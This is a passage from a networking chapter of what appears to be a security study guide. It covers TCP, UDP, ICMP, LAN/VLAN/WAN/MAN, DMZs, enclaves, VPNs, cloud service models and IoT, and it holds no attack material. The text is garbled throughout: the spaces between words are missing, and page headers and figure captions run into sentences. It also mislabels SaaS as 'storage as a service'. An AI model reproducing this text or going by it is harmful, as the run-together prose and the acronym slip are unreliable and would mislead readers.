Three-­wayhandshakeSYNSYN/ACKACKSincebothsidesareexpectedtorespondtomessageswithinformationprovidedbytheother,wecanbeassuredthatthemessagewasreceivedbytheintendedpartyandbothsidesarewhotheyclaimtobe.Ifeithersidewereattemptingtospoofaconversation,theywouldn’treceivethemessagesand,asaresult,wouldn’trespondcorrectly.Thenextmechanismthathelpsensurereliabilityisthesequencenumber.Sincethesequencenumbermaintainsthenumberofbytesthathavebeensent,theacknowledgmentnumbertellsthesenderwhetheranydatahasgonemissingintransmission.Ifithas,thesenderknowsitneedstoberetransmitted.Eachsideoftheconversationknowswhereitisandwhereitspartneris.TCPretransmitsasneeded,uptoadefinedmaximum.38 Chapter2  NetworkingFoundations■Additionally,thesequenceandacknowledgmentnumbersensurethecorrectorderofmessagesattherecipient.Ifmessagesarriveoutoforder,thesequencenumbersindicatewhethermessagesshouldbeheldforamessagethatgotlost.Thisisalsoapartofguaranteeddelivery—­makingsurethatthemessagesnotonlyarriveasexpectedbutalsoareinthecorrectorderwhentheygetthere.Allofthis,though,incursoverhead.NoteveryapplicationneedstheguaranteeddeliverymodelthatTCPprovides.UDPTheUDPoffersanothermodeoftransportthatdoesn’thavethesameoverheadthatTCPhas.It’samuchlighter-­weightprotocolthatoffersnoguaranteeofdelivery.MessagessentusingUDParejustputoutonthewirewiththehopethattheywillgettothedestinationbecausethenetworkprotocol,IP,willjusttakecareofeverything.Withthelighterweightcomesverylittleoverheadfromthingslikeestablishingconnectionsandmakingsurethatmessagesgetwheretheyaregoing.Italsodoesn’tmuchmatterwhichordermessagesarereceivedinfromthestandpointoftheprotocol.Iftheapplicationisinterestedinthosesortsofdetails,itcantakecareofthemanagement.TheRFCforUDPisRFC768.TheentireRFCisalittleovertwopageslong,whichshouldmakeclearhowsimpletheprotocolis.YoucanseeanexampleofaUDPheaderinFigure 2.12.Therearefourheaderfields.Allofthemare16bitsinlength.Unsurprisingly,halfofthemarethesourceanddestinationports.What’sinterestingaboutthatisthesourceportisconsideredanoptionalfield.Thereasonforthisisthatsincethereisnoconnection,theremayneverbearesponsefromtheserver.It’sentirelyuptotheapplicationinuse,whichisdifferentfromTCP.AsourceportisrequiredwithTCPbecausetherewillalwaysbearesponse,evenifit’sjustusedtocompletethethree-­wayhandshake.FIGURE 2.12 UDPheadersInterestingly,perhaps,RFC768doesnotdefinearesponsetoaclosedUDPport.Infact,closedportsarenotmentioned.TheonlyplacewhereresponsestoclosedportsarementionedthatisrelevantisintheRFCfortheInternetControlMessageProtocol(ICMP).Eventhen,thereisjustacodeforportunreachable.Thereisnoindicationaboutprotocolwhereitapplies.Forthisreason,workingwithUDPportsisentirelyunreliable.Ifyoudon’tgetaresponse,itcouldbearesultofalostordroppedpacket.Itcouldbetheapplicationignoredthemessage.Itcouldbetherewasnoresponserequired.Anyofthosearelegitimatescenariosinwhichyouwouldn’tgetaresponsetoamessagetoaUDPport.InternetControlMessageProtocol 39UDPisgoodforapplicationsthatrequirefastsetupandtransmission.Asanexample,streamingvideoandaudioworkwellwithUDP.Theydon’tworkwellwithTCP.OnesignificantreasonforthatisthatwithUDP,it’suptotheapplicationtodoanyreorderingofmessages,asrequired.Ifadatagram(thePDUforUDP)comesinoutoforderwithstreamingvideo,theapplicationwilljustdiscardit.Thesameistruewithstreamingaudio.ImagineforasecondifyouweretalkingtosomeoneovertheInternet.Yousaidhellotothepersonontheotherend.Inreality,thatwordwouldlikelybetransmittedallinonemessage,butlet’ssaythateachlettersoundwastransmittedinitsownmessage.Ifyouweretoreceivemessageswiththesoundsl,h,l,o,andthene,whatwoulditsoundliketoyou?Ourbrainsarereallygoodatpiecingmissingdatatogetherandconstructingsomethingthatseemswhole,butitcouldbeyourbrainwouldn’tbeabletomakesenseofthewordasitsounded.Evenifyourbraincouldunderstandit,itwouldsoundweirdandyouroverallexperiencewouldbebad.Thesameistrueforvideo,ofcourse.Iflatearrivalswereinsertedintothevideostreamyouwerewatching,itwouldseemveryjumpy.Whywouldmessagescomeinoutoforder?Afterall,wehaveveryreliableInternetservicethesedays.Well,thereareseveralreasonsformessagescomingoutoforder.Let’ssaythatyou’resendingalongastreamofdatatosomeoneusingUDP.YouaresendingyourdatathroughthepathA➢B➢C➢D,whichisyourdestination.However,let’ssayCdropsjustasyourmessageisabouttogettoit.ThenetworkcorrectsandroutesaroundC,takinganotherpath,perhapsA➢E➢F➢D.However,thefailureoccurredwhileatleastoneofyourmessageswasinflight,andyouhavenowayofknowingthemessagewasjustdroppedduetoafailure.Evenifit’snotafailureandmessagesaredropped,itcouldbethatonemessagetakesonerouteandalatermessagetakesanotherroute,whichhappenstobefaster.Thelatermessagemayarriveearlierthanthepriormessage.Therearemanyreasonsmessagesmayarriveoutoforderorevencomeupmissingaltogether.Lotsofthingshappeninthenetworkthatusersaren’tawareof.That’swhymostapplicationsrelyonTCP.Mostapplicationsrelyonmessagesthatarepresentedinthecorrectorder.Real-­timeprotocolsarelessconcernedaboutcorrectorder,sotheyuseUDP.InternetControlMessageProtocolTheICMPisaspecialcasewhenitcomestoprotocols,inthatitdoesn’tcarryuserdata.Instead,itworkswithotherprotocolstoprovideerrorandcontrolmessaging.Whensomethingunexpectedhappensonthenetwork,deviceswillgenerateICMPmessagestosendbacktotheoriginatingdevicetoletthemknowthattherewasaproblem.ItdoessitontopofIP,becauseitneedstheaddressingofIP,butitisconsideredtobepartoftheInternetlayerasIPis.Thisalsomakesitabitofanunusualprotocol,becauseitsortofsitsabovetheInternetlayerbutisn’taTransportlayerprotocol.ICMPisdefinedinRFC792,whichspecifiesaheaderof8bytes.Thisconsistsofthetypeandcodefields,whichconveytheessentialinformationforICMP,achecksumfield,andthen4bytesthatarelabeled“restofheader.”Thetypeandcodeareeachabyte,andthe40 Chapter2  NetworkingFoundations■checksumis2bytes.Therestoftheheaderfieldcontainsdatarelatedtothetypeandcode.Thetypeandcodedefinewhatgoesintothose4bytes.Thetypemessageindicatesthemessagebeingsent.Itmayhavevaluesthatrefertoechoreply,echorequest,destinationunreachable,sourcequench,ortimestampmessages.Eachtypemayhavemultiplesubtypes.Thedifferentsubtypesarespecifiedbythecodefield.Asanexample,thedestinationunreachabletypehascodesthatwouldindicateexactlywhatthedestinationis.Thismaybeanetwork,ahost,oraport.Itmayindicatethattheyareunreachable,oritmayindicatethatthemessagethattriggeredtheICMPmessagewasadministrativelyprohibited.AnyonedoingsecuritytestingorpenetrationtestingwillmostcommonlyrunacrossICMPmessagesthroughtheuseofICMPechorequestandechoreplymessages.Theseareusedbythepingprogram.Youmayalsousethetracerouteprogramtogetthenetworkroutetoadestination.ThetracerouteprogramreliesontwoICMPmessages.ThefirstisICMPtype11,whichistimeexceededintransit.Thismeansthatthemessage’sTTLfieldgotdecrementedtozero.Whenthetraceroutecompletes,theprogramexpectstogetanICMPtype3,destinationunreachablemessage,probablywiththecode3,meaningdestinationportunreachable.NetworkArchitecturesWe’vetalkedabouttopologies,andthosearehelpfultogetconceptual,logicalrepresentationsofyournetwork.However,thereisalargercontextforthenetworkaswell.Pullingthetopologytogetherwithdataflowsandothernetworkelementswillgiveyouanetworkarchitecture.Thisdescribestheprotocolsthatareusedandwheretheyareused,andyoumayalsogetsecurityenclavesaspartofanetworkarchitecture.Youwillalsohavetocontendwiththeideaofmultiplelocations.Fromasecurityperspective,thereareotherelementstoconsider,includingisolation.Thismaymeancategorizingsystemsbasedonusageandrisk.Somesystems,especiallythosethatneedtobedirectlyfacingtheInternet—­meaningthatexternaluserswillmakenetworkconnectionstothosesystemsasanormalcourseofoperation—­maybekeptseparateandprotectedfromsystemswhereusersareorevenwheresensitivedataisstored.NetworkTypesForourpurposeshere,we’regoingtocategorizenetworktypesintothegeographyofthenetwork.Logicaldiagramsarenice,butitdoesn’tgiveyouasenseofwhereeverythingislocated.Usingalogicaldiagram,youmaygetthesensethatsystemsareveryclosetogetherwhen,infact,theymaybemilesapart.Becausemodernnetworktechnologycancoverallmannerofsins,sotospeak,youcanhavesystemsthatarehundredsofmilesapartappearingasthoughtheyareonthesamephysicalnetworksegmenttogether.NetworkArchitectures 41Becauseofthat,wecantalkaboutdifferenttypesofnetworksbasedontheirgeography.LocalAreaNetwork(LAN)  ALANisjustwhatitsnameimplies.Allofthesystemsarelocalandprobablyinthesameroomorbuildingoronthesamefloor.Thesesystemswouldbeinthesamebroadcastdomainorcollisiondomain,phrasesthatmeanthesystemscancommunicateusinglayer2 withouthavingtoroutetoothernetworks.However,theymaynotnecessarilybecommunicatingusinglayer2.Theycouldstillbelocalbutonaseparatenetworksegment,whichwouldmeanthetrafficbetweenthosenetworksegmentswouldneedtoberouted.VirtualLocalAreaNetwork(VLAN)  AVLANisaLANwheretheisolationatlayer2ishandledbysoftware/firmwareratherthanphysically.Thismeansthatsomeswitchescanbesegmentedintoseparatenetworkswithsomesystemsononenetworksegment(VLAN)andsomesystemsonanothernetworksegment(VLAN).TogetfromoneVLANtoanother,thetrafficwouldhavetocrossoveralayer3boundary(router).Thissortofsegregationhelpstomaintainnetworkperformance.ItalsohelpswithlogicalorganizationofthenetworksothesamesetoftrafficpoliciescanbeappliedacrosstheentireVLAN.Finally,therearesomesecurityconsiderations.WithaVLAN,youcanplaceafirewallbetweenyournetworksegments.Whileyoucanrunhost-­basedfirewalls,it’sfareasiertomaintainasinglenetworkfirewallandrestricttrafficbasedontheneedsofeachnetworktocrossthelayer3boundary.WideAreaNetwork(WAN)  AWANisanetworkwhosenodesaremorethan10orsomilesapart.AnyInternetserviceproviderwouldhaveaWAN.Additionally,businessesmayhaveWANswheretheyhavenetworkconnectionsthatprovidelinksbetweentheirdifferentofficelocations.Thereareanumberofwaystoprovidethatsortofconnectivitybetweengeographicallydispersedlocations,includingvirtualprivatenetworks,privatenetworkcircuits,orjusttunnelingtrafficwithoutencryptingitasavirtualprivatenetworkwoulddo.MetropolitanAreaNetwork(MAN)  AMANsitsinbetweenaLANandaWAN.Youmayfindthisifacompanyhasacampuswithmultiplebuildings.EachbuildingwouldhaveaLAN(ormaybemultipleLANs),buttheconnectionofLANsbetweenallthebuildingswouldbeaMAN.Thesamewouldbetrueifacityhadconnectionsbetweenallofitsdifferentofficesandbuildings,spreadaroundthecity.ThoseconnectionswouldbeaMAN.Essentially,anythingsmallerthanaWANbutspreadacrossalargergeographicareathanaLANwouldbeaMAN.IsolationNetworkisolationisanimportantconcept.Infact,it’sawidelyrecognizedapproachtoseparatingnetworkelementsinordertoprotectsensitivedata.Additionally,itwouldbeusedtoseparateexternallyaccessiblesystemsfromthosethatarestrictlyinternal.Thereareseveralwaystoachievethisisolation.42 Chapter2  NetworkingFoundations■Acommonapproachistouseademilitarizedzone(DMZ).Thisisanetworksegmentwhereanyuntrustedsystemwouldbeplaced.Accesstothisnetworksegmentcouldbetightlycontrolledusingafirewalloraccesscontrollists.InFigure 2.13,youcanseeasimplediagramdemonstratingwhatthismaylooklike.TheDMZmayholdsystemslikethewebserver,forexample.Itmayalsoholdanemailgatewaytofiltermessagescominginbeforesendingthemontotheinternalemailserver.TherearemanyusesforaDMZtoisolateuntrustedsystemsfromtheremainderofthenetwork.AnuntrustedsystemisonethatanyonefromtheInternetcangetaccessto,whichmeansitcouldbecompromisedinsomewaythroughtheservicethat’sexposed.Firewallsand/oraccesscontrollistspreventpeoplefromtheoutsidegettingaccesstointernalsystems.ItalsopreventsanysysteminsidetheDMZfromcommunicatingwithsystemsinsidetheenterprise.FIGURE 2.13 DMZnetworkInternetInternalServersDMZDesktopNetworkIfyouareusingaDMZ,thatsuggestsnetworkisolationalongwithtightaccesscontrolandrestrictiverulesaroundaccessingthenetwork.Networksegmentationcanalsoisolateothersystems,withoutnecessarilyintroducingthefirewallrulesoraccesscontrollists.Youcanseetherearealsonetworksegmentsforinternalserversaswellasdesktopnetworks.Theremayalsobemanyothernetworksegments.Eachofthemwouldhavedifferenttrustlevels.Forexample,theremayalsobeaguestnetworktoallowvendorsandothervisitorstohavenetworkaccesswithoutanyabilitytogetaccesstoanyoftheinternalsystems.NetworkArchitectures 43DMZsarenottheonlywaytoisolatenetworks.ProtectingtherestofthenetworkfromInternet-­facingservicesisalsonottheonlyreasontodonetworkisolation.Acommonwayofprotectinghighlysensitiveinformationistouseenclaves.Anenclaveisanisolatednetworksegmentwheretightcontrolsmaybeplaced.Ifyouhadanypaymentcarddata,suchascreditcardinformation,forinstance,thesystemsmayrequirenotonlyadditionalprotectionsbutalsoadditionalmonitoring.Thismayinvolvefirewallsandintrusiondetectionsystems,bothatthenetworkandhostlevels.Organizationsmayhaveseveralenclavesthatarecreatedforspecifictypesofdata.Creditcarddata(oftencalledPCIfortheorganization,PaymentCardIndustry,thatmanagesthedatasecuritystandards)isacommonone,butyoumayalsoseeanenclaveforpersonalhealthinformation(PHI).IfanorganizationhasanyPHI,therewouldberequirementsfromtheHealthInsurancePortabilityandAccountabilityAct(HIPAA)arounddatahandlingthatcouldmoreeasilybeimplementedinanenclave.RemoteAccessJumpingintotheTARDISforamomenttogoway,waybackintime,remoteaccessusedtobehandledwithmodemsanddial-­upaccess.Thosedaysarelongpast,thoughtheneedforremoteworkerstogainaccesstointernalresourcesisperhapsevenmorenecessarythanithasbeeninthepast.Thesedays,though,remoteaccessisoftenhandledacrosstheInternet.Thiswouldn’tnormallybehandledacrosstheopenInternetbutinsteadthroughtheuseofencryption.Virtualprivatenetworks(VPNs)areawaytogainaccesstotheinternalnetworkfromremotelocations.VPNs,though,arenotallcreatedequal.Therearedifferentwaystoaccomplishthisremoteaccess.Insomecases,theremoteaccessisasatelliteoffice.Inthatcase,itmaynotmakesensetohaveadirect,privatelinefromsitetosite.Instead,thenetworkprovidermayoffersomethingwithintheirnetworktogetfromonelocationtotheother.ThismaybedoneusingMultiprotocolLabelSwitching(MPLS),forexample.MPLSprovideswhatisessentiallyatunnelfromonelocationtoanotherbyencapsulatingtrafficinsidealabelwherethetrafficgetsswitchedfromonelocationtotheother.Morecommonly,atleastintermsofvolume,thereisaneedforuser-­to-­networkconnectivity.Evenhere,therearemultiplewaystoaccomplishthetask.Oneway,whichhasbeenaroundfordecadesatthispoint,waspartoftheworkonIPv6.IPSecurity(IPSec)isasetofextensionsthat,inpart,provideforencryptionfromonelocationtoanother.IPSeccomeswithanumberofprotocolsthatprovidenotonlyencryptionbutalsomessageauthentication,userauthentication,andkeyexchange.BecauseIPSecisn’taninherentpartofIPv4,itrequirestheuseofsomeothermechanismtoimplementoverIPv4 networks.ThisgenerallyrequiresinsertingsomethingintothenetworkstacktocatchthetrafficbeingsentandapplyingappropriateIPSecpolicies.AnothertypeofVPNconnectionusesatechnologythatmostpeoplewillbefamiliarwith.WebconnectionsoftenuseTransportLayerSecurity(TLS),whichisthecurrentimplementationofencryptionforwebtraffic,supersedingSecureSocketsLayer(SSL).Asthisisa44 Chapter2  NetworkingFoundations■well-­knownandcommonlyusedmethodofencryption,companiesoftenhavemanyoftheinfrastructurerequirements,likecertificateauthorities,necessarytoimplementthistypeofVPN.Additionally,thistypeofVPNisoftendeployedusingawebbrowserratherthanaheavier-­weightapplicationinstallation.CloudComputingTheworldofcomputinghaslonghadthenatureofapendulum,particularlywhenitcomestowherethecomputingpowerexisted.Decadesago,inthe1960sand’70s,therewereservicebureausthatcompanieswenttowhentheyhadcomputingneeds.Thiswasbecausemainframeswerefarmoreexpensivethanmostcompaniescouldaffordorjustifytheexpense.Businesseshadtotrusttheseservicebureauswiththeirinformationtohavetheirjobsperformed,whetheritwaspayrollordatamergesformailinglistsorwhatevertheneedhappenedtobe.Whenpersonalcomputers(PCs)becameathing,companiescouldbuyoneandhavetheirowncomputersystemstoperformthejobstheyneededtohaverun.Thismeantalldataprocessing,suchasitwasknownatthetime,couldbepulledbackinhouse.So,thependulumswungfromoutsourcingtoin-­housing.Eventually,thecostofthePCcamedown,andthebusinesscouldaffordmultiplesystems,sodatawasstoredontheindividualsystems,oratleastonfloppydisksattheusers’desks.Latertherewereswingstoputmoreterminalsfromthemainframeonusers’desks,centralizingdatastorageagain.WhentheWorldWideWebwascreatedandbusinessesstartedrealizingthevalueofhavingfull-­timeconnectionstotheInternet,theyusedhostingproviderstooutsourcefunctionslikewebsites,wheretheremaybeatleastmarketingmaterialsifnototherbusinessdata.WhenInternetaccessgottobereallycheapandubiquitous,businessestooktheirhostingbackin-­house.Allofthisistosaythatwearenowbackatapointwhereoutsourcingisthewayalotofbusinessesgo.Afterall,withsomanyusersonline,businessescanseealotoftraffictotheirsystems.Additionally,outsourcingkeepsexternallyaccessiblesystemsoffthecorporatenetwork.Thismeansattackerscan’tbreachanexternallyavailablesystemanduseitasajumping-­offpointtoothersystemsonthenetwork,includingdesktopswherepersonalinformationmaybestored,orevensensitivebusinessdata.Today’sversionofoutsourcingiscloudcomputing.Thishasseenanevolutionovertime.Initiallytherewerehostingproviders,wherecompanieswouldtakeonthecostofthehardwareandalltheinfrastructure,offeringthathardwareandinfrastructuretocompaniesthatdidn’twanttohosttheirownsystems.ThishardwarewassometimesdedicatedtotheCloudComputing 45businessthatwasrentingitforitsservices,whichmadeithardtorecoupthecostsofthehardwareandstillhavethepricingmakesensetogowithahostingprovider.ThentherewerebusinesseslikeAmazonandGooglethathadlargefarmsofsystemsthatweresometimesidle.Thesecompaniesdevelopedserviceswherebusinessescouldusethoseidlesystemsfortheirownpurposes.BecausealloftheseserviceswereavailableovertheInternet,andnotonpremises,theyweresaidtobeavailableinthecloud.Thesecloudcomputingservicescomeindifferentforms.Thefirst,andonethatlargenumbersofpeopleusetoday,isstorageasaservice(SaaS).Storageasaserviceisbasicremotediskfunctionalitythatcanbejustasgearedtowardusersastowardbusinesses.Businessesaremorelikelytouseinfrastructureasaservice(IaaS)orplatformasaservice(PaaS).Theymayalsousesoftwareasaservice,thoughthatcanalsobegearedtowardat-­homeusersaswell.Storageas aServiceIfyouareusinganAppledevice,youarelikelyusingstorageasaservice.AnyphotosyoutakearestorediniCloud.Yourmusicmaybestoredthere.DocumentsyoucreatecanalsobestorediniCloud.IfyouhaveanAndroiddevice,youwouldlikelyalsobeusingacloudstoragesolution,dependingonthevendor.Androiddevicesdon’talwaysusecloudstoragebydefault,thoughgenerallythereisthecapabilitytostoredataeithertoGoogleDrive,Google’sstorageasaservicesolution,ortothestorageprovidedbyanothervendor.Storageasaservicehasalargenumberofuses,includingbackupsandtheabilitytoaccessyourdatanomatterwhereyouareorwhatdeviceyouareusing.Figure 2.14showsaportionoftheinterfacefromGoogleDrive.UsingGoogleDrive,Ihavebeenabletoviewdocumentsondifferentcomputersandtablets,dependingonwhatmyneedwasatanygiventime.Thiswasusefulforperformingresearchforclassassignments,asanexample.Icouldsearchfordocumentsonmylaptop,downloadthePDFfilesofresearchpapers,andthenstoretheminmyGoogleDriveaccount,whereIcouldopenthemonatabletandreadthemcomfortably.Somestorageasaservice(StaaS)providersgiveyouaccesstoyourstorageeitherusingawebinterfaceorwithaplug-­inonyoursystemsoyoucanlookateverythinginafileexplorercontext.Thisisnotalwaysthecase.Forexample,Appledoesn’tgiveyoudirectaccesstoeverythingstorediniCloud,whetherthroughFinderorawebinterface.Instead,youhavetomanagedifferentsectionsofyourstorageusingtheapplicationsthatmakeuseofthedata.Thereare,ofcourse,downsidestousingacloudstorageprovider,asanyofthecelebritiesinvolvedinthecompromiseandtheftoftheirpersonalphotosfromacloudstorageprovider46 Chapter2  NetworkingFoundations■couldtellyou.Tocollectalargeamountofdataallatonce,it’snotnecessarytocompromisealotofsystems.Allanattackerneedstodoiscompromisethestorageprovider.Thisrequirestheprovidertomakesurethereareadequatecontrolsinplacetokeepunauthorizedusersfromgettingaccess.Theproviderisalsoexpectedtopreventdataleakage.Thismightmeananauthorizedusergettinginadvertentaccesstofilestheyshouldn’tbeauthorizedfor.FIGURE 2.14 GoogleDriveInfrastructureas aServiceBusinessescanspendalotofmoneyonthehardwarenecessarytomaintainalltheservicestheyrequirejusttostayoperationalandefficient.NotonlyarehardwaresystemsexpensiveCloudComputing 47whenyouaddallthehardwarecoststogether,buttheinfrastructurenecessarytosupportthehardware—­power,floorspace,networking,coolingsystems,firesuppression—­isverycostly.Keepinmindthatbestpracticeoftensuggestsprocessisolation,meaningthatsystemsdon’tnecessarilyrunmultipleapplications.Instead,theemailservergetsitsownhardware,thewebservergetsitsownhardware,andonandon.Allofthesecostsaddup.Whilevirtualizationhasbeenaroundsincethe1980s,it’sreallyonlybeeninthelastdecadeorsothatthehardwarehasbecomebeefyenoughandthesoftwarehasevolvedtobeabletoreallysupportrunningseveralvirtualsystemsontopofasinglepieceofhardware.Consumervirtualizationhasbeenaroundforages,butbusinesseshaven’tbeenabletomakeeffectiveuseofthatsoftwarebecausetheyaretryingtomanagemaybehundredsofsystems.Lotsofsmallerhypervisorsarehardertomanageatscale.Havingthemanagementcapabilitiestooperatethatmanyvirtualmachines(VMs)wasnecessary.CloudproviderssuchasAmazon,Google,andMicrosoftmakeextensiveuseofVMstogivetheiruserstheabilitytorunsystemsonhardwareownedandmaintainedbytheprovider.Thishasthepotentialtomakeinfrastructurefarmorecosteffectiveforbusinesses.Thebusinessthatneedsthesystemdoesn’thavetopaythehardwarecostsoranyoftheothercoststhatcomewithhavinghardwarearound.Additionally,businesses,particularlysmallormedium-­sizedbusinesses,probablycan’taffordhigh-­endpowermanagementwithredundancyandfaulttoleranceorhigh-­endnetworkingorcoolingorfiresuppression.Theymaynotevenbeabletofindhighlyskilledpeopletheycanaffordtopaytomaintainallthesystems.Usingtheseproviderscanhelpsharethecostsacrossallofthepeoplewhousetheservices.Certainlybycomparisontoacquiringahardwaresystemandthengettingitprovisioned,settingupaninstancewithacloudprovidertakesalmostnotime.Ifyouneedaninfrastructuresystem,yougototheportalforyourcomputingproviderandselecttheoperatingsystemyouwantandthenthesizeofthehardware—­memorysizeanddiskspace.Figure 2.15showsasmallsampleofsystemsthatareavailablewithAmazonWebServices(AWS)usingitsElasticComputeCloud(EC2).TherearemultipledistributionsofLinuxaswellasdifferentversionsofWindowsavailable.FIGURE 2.15 AmazonWebServices48 Chapter2  NetworkingFoundations■Amazonisnot,ofcourse,theonlycompanythatdoesthis.Thereareseveralotherprovidersthatofferthesamesortofservice,includingMicrosoft,Google,andDigitalOcean.Usingthisapproach,youcouldspinupasetofinfrastructuresystemstosupportacompletewebapplicationinanafternoon.Youcouldalsogetacompletesecuritysolutionwithpoliciespreventingadversariesfromgainingunauthorizedaccess.Whiletheprovidersdotheirbesttohelpkeeptheircustomersprotected,itstillcomesdowntocorrectprovisioningonthepartofthecustomer.Microsoft,forexample,hasnetworksecuritygroupsthatallowthecustomertocreaterulestoallowanddisallowtrafficintothevirtualsystems.Thecustomercouldeasilycreatebadrules,andtherereallyisn’tanythingMicrosoftcandotokeepthatcustomerfromshootingitselfinitsbottomline.Platformas aServiceSometimesjustapieceofhardware,evenvirtual,withanoperatingsysteminstalledisn’tsufficient.Youmayneedapieceofsoftware,likeadatabaseserveroragroupwareserver.You’dneedtoacquirethesoftware,getalicense,andgetitinstalledandconfigured.Thatistime-­consuming,andit’softenverycostlyupfronttopayforthesoftware.Thenmakingsureit’sconfiguredcorrectlytakesknowledgeandskill.Thismayputitoutofreachofsmallerorganizations.Cloudprovidershaveasolutionforthisproblem.Inadditiontojustgettingasystem,youcangetaninstanceofasystemthatisalreadyconfiguredwithenterprisesoftware,likedatabaseservers,applicationservers,orevensecuritydevices.Figure 2.16showsasmallcollectionofsomeoftheapplicationsthatareavailableintheAmazonWebServicesmarketplace.Afterselectingoneoftheseapplications,basedonwhatisneeded,thevirtualmachinewiththenecessaryoperatingsystemisstartedandtheapplicationisalreadyinstalled.Inadditiontotheonesavailableinthemarketplace,youcancreateyourownimages,storedasAmazonMachineImages(AMIs).Thismaybenecessaryifacompanyhasitsownapplication,developedin-­house,thatneedstorun.OncethereisanAMI,multipleinstancesofthatimagecanbespunupasneeded.MicrosoftalsohasamarketplacewithitsAzureservice.Figure 2.17showsalistofcategoriesinwhichimagesareavailable,aswellasalistofdatabaseserversthatyoucanselecttocreateaninstancefrom.InadditiontoalltheMicrosoft-­providedsolutions,therearealargenumberofvendorsprovidingtheirownsolutions.Inthelistofcategories,youcanseeSecurity,forexample.Someofthepossibilitiesarevirtualimagesofsolutionsthatmaynormallybethoughtofashardwareappliances.Firewalls,loadbalancers,denial-­of-­serviceprotection,andothersecurityfunctionsareavailableforselection.UsingPaaS,youcanquicklycreateanentirevirtualnetworkwithallofthevirtualdevicesneededtosupporttheserviceorapplication.Ifneeded,systemsfrominsidetheenterprisenetworkcanbeintegratedwiththeonesfromthecloudprovider.CloudComputing FIGURE 2.16 AWSmarketplaceimagesNormalaccessprotocolsarecommonlyusedtogettothevirtualdevices,likeSSHandRemoteDesktopProtocol(RDP).Thismeansthattheseserviceswouldbeexposedtotheoutsideworld,thoughaccessrulescanbecreatedtonarrowaccessdowntospecificsourceaddresses.Bydefault,though,theservicesmaybeexposedtotheoutsideworld,meaningtheyareavailabletoattack.Addressingwithintheenvironmentmaynotbestatic,though.Thismeansthateachtimesystemsarebroughtonline,theymaygetadifferentexternaladdress.Theremaybenetworkaddresstranslation(NAT)inplace,forwardingmessagesdestinedtotheexternalIPaddresstoaprivateaddressinsidethesolution.Softwareas aServiceNativeapplicationsthatrunonyourdesktoparen’talwaysrequiredanymore.Again,youmaynotbeboundtoaspecificsystemwithapieceofsoftwarethat’slicensedjusttothatsystem.Instead,manycompaniesareofferingtheirapplicationsinthecloud,meaningthey4950 Chapter2  NetworkingFoundations■havedevelopedtheirapplicationstoruninsideawebbrowser.YoumayhaverunacrosstheseservicesifyouhaveusedGoogleDocsorOfficeOnline,justasacoupleofexamples.Thereisalargeamountofsoftwarethat’savailablethroughawebinterface.Insomecases,asinthecaseofGoogleandMicrosoft,thereisalreadystorageasaserviceonoffer,soanydocumentsyoucreatearestoredthere.Third-­partysoftware,though,canalsointerfacewiththesestoragesolutions.FIGURE 2.17 AzureMarketplaceimagesForexample,someofthenetworkdiagramsinthischapterweredoneusingdraw.io,awebapplicationthatdoesdiagramming.SomeoftheotherdiagramsweredoneusingVisioOnline.TherearealsosolutionslikeSmartsheet,whichdoesspreadsheetsandprojectplanningonline.Customerrelationshipmanagement(CRM)canalsobeaccessedentirelythroughawebinterface.Thismakesdeliveryofthesolutionmuchfasterandeasierforthesoftwarecompany,nottomentionmuchfasterandeasierfortheconsumer.Inmanycases,CloudComputing 51youcangetstartedwithoutanyup-­frontcosts,dependingonwhatyouarelookingforandhowoftenyouaregoingtouseit.Fromasecuritystandpoint,thissortofsolutionanddeliveryactuallyhasthepotentialtovastlyimprovetheprocessoffixingvulnerabilities.Whenavulnerabilityinawebapplicationisdiscovered,itcanberesolved,tested,anddeployedwithoutanyworkonthepartoftheenduser.Thisrelievestheneedforautomaticupdatesonnativeapplicationsdeployedonusers’systems.Becauseapplicationsarenotalwaysupdatedwhentheyarerunningonanenduser’ssystem,peoplearen’trunningout-­of-­datesoftwarefullofvulnerabilities.Itdoesmean,though,thatpotentiallysensitivedataisstoredwithathird-­partyservice.ItalsomeansthatthedataistransmittedfromthewebbrowsertotheserviceproviderovertheInternet.MostsitessupportSSL/TLS,sothecommunicationwouldbeencrypted,buttherehavebeenvulnerabilitiesinSSL,whichhaveledtoinformationexposure.ThisisnottocastdoubtonSSL/TLSinanyway.It’sjustworthkeepinginmindthatdatabeingtransmittedacrossnetworkshasthepotentialtobecapturedandanalyzed.Internetof ThingsIfyoudon’thaveseveralofthesedevicesin-­house,you’veprobablyseenthem.Theextremeexamplesarethingssuchasrefrigerators,toasters,andcoffeemachines.Beyondthose,though,arehomeautomationdevices,digitalvideorecorders,andcable/satelliteset-­topboxes.AnyofthesedevicesthathaveembeddedsoftwareandalsohavenetworkaccessareconsideredtobepartoftheInternetofThings(IoT).Essentially,anythingthatcanbereachedoverthenetworkthatdoesn’thaveabuilt-­inscreenortheabilitytotakedirectuserinteractionispartoftheInternetofThings.Smartphonesorgeneral-­purposecomputerswouldnotbepartoftheInternetofThingsbecausetheyhavetraditionalinput/outputdeviceslikeascreenandkeyboard,evenifthekeyboardisvirtual.Manyofthesedevicesrunasmall,embeddedimplementationofLinux.Othersuseotherembeddedoperatingsystems.Areasontobringthisuphere,withcloudsolutions,isthatcloudprovidersaresupportingthesedevicesbyofferingcommunicationhubs.MicrosoftAzurehasanIoThubtoconnectthesedevicesto.Thereareacoupleofreasonsforthis.Oneofthemistoacquireandstoreanydatafromthedevices.Otherapplicationslikedatabasesandmachinelearningsystemscanthenbeusedwiththedatathat’sacquiredforprocessingandanalytics.Amazonhasasimilaroffering.Inadditiontoacquiringdatafromthesesimpledevices,thehubcanbeusedfordevicemanagement.Commandscouldbesenttothedevicesfromthesecentralhubs.CommonprotocolslikeHTTPmaybeusedtocommunicatewiththedevices.Theremayalsobeotherprotocols,likeMessageQueuingTelemetryTransport(MQTT).Thiswouldbeusedforenablingmessagingbetweendevices.MessagingprotocolslikeMQTTmayuseapublish/subscribemodelformultipledevicestogainaccesstoamessagingbus.Theseserviceofferingsfromcloudprovidersgiveeverybusiness,includingstartups,theabilitytocreateaninfrastructureandanapplicationtosupportdevicestheywanttomanufacturewithoutalotofinvestmentupfront.Alloftheinfrastructure,withaveryrobustimplementation,isbeingtakencareofalready.52 Chapter2  